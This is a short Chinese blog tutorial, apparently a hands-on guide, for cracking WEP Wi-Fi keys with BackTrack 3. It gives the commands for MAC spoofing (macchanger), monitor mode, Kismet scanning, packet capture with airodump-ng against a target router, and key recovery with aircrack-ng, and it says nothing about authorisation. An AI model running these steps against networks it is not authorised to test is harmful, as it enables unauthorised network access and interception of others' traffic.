软件下载地址:
http://www.remote-exploit.org/backtrack_download.html
可以做成是LiveCD,或是U盘。我比较喜欢U盘,这样比较节省介质,而且更新的时候不会浪费光盘。好像是一个意思。
应用BT3破解步骤简要说明:
1:无线网卡MAC地址伪装
2:修改网卡模式为监听,启用并激活无线网卡。
3:获取无线路由的相关信息(MAC、SSID、Channel),可以通过Kismet,亦可用其他方式获取。
4:监听指定路由器,抓包
5:获取到足够多的数据包后(通常Wep的),进行破解。
由于对于原理不清楚,以下仅是傻瓜式的操作说明。
1:查询无线网卡的设备名(可能是eth,wlan,wifi,ath),总之在未启用的状态下修改它们。
首先用ifconfig -a查看一下无线网卡设备名,修改如下:
macchanger -m 00:11:22:33:44:55 wlan0
如果已经激活,请先down掉,再修改。
ifconfig wlan0 down
判断是否激活就是用ifconfig来查看,是否出现在列表。
未激活状态的设备wlan0,是不出现在ifconfig的显示里面。
但是可以出现在ifconfig -a菜单里面。
2:修改网卡监听模式,并启用。
如下命令:
iwconfig wlan0 mode monitor 或者用 airmon-ng start wlan0
修改模式后,用iwconfig检查mode是否改变。
iwconfig wlan0
经上述修改后,启用网卡
ifconfig wlan0 up
3:监听无线路由的相关信息MAC、SSID、Channel
三种方法:
A:Win下获取
B:iwlist wlan0 scanning
C:kismet
(提示:bssid其实就是无线路由的MAC地址。)
这里简要介绍一下Kismet的监听,使用。
使用Kismet命令,需要修改配置文件/usr/local/etc/kismet.conf
source=none,none,none
例如T61,用的4965的无线网卡。
source=iwl4965,wlan0,1
例如TP-link的atheros的无线网卡
source=ath5k,ath1,1
从上面可以看出一些端倪,
source=1,2,3
字段1:请参考http://www.kismetwireless.net/documentation.shtml
字段2:设备名
字段3:我不知道是什么,总之写1都没有出过错。
字段1我曾经以为就是无线网卡模块的名字,后来发现不是完全匹配的。不过至少可以尝试lsmod看看。然后去那个URL那里找。
4:上述准备充分后,就可以进行抓包的动作了。
用下面命令抓包
airodump-ng -w outfile --channel 11 --bssid 00:12:34:56:78:90 wlan0
上面的命令很容易理解,监听11频道,MAC地址为00:12:34:56:78:90的无线路由器。
-w outfile 是产生前缀为outfile的2个文件。当你第一次执行这个命令时,产生下面的2个文件
outfile-01.cap 和 outfile-01.*(忘记这个文件的扩展名了)
通常:
64-bit WEP “暴破”需要3W个包
128-bit WEP “暴破”需要10W个包
5:破解
aircrack-ng -x -f 2 outfile-01.cap
aircrack-ng -w dict.txt outfile-01.cap
因为对于无线加密这些原理没有深入的了解,所以这些操作仅存在于表面上。以后有时间自己再研究一下。
http://hi.baidu.com/w32508/blog/item/ee1762f448ad85dcf2d385c6.html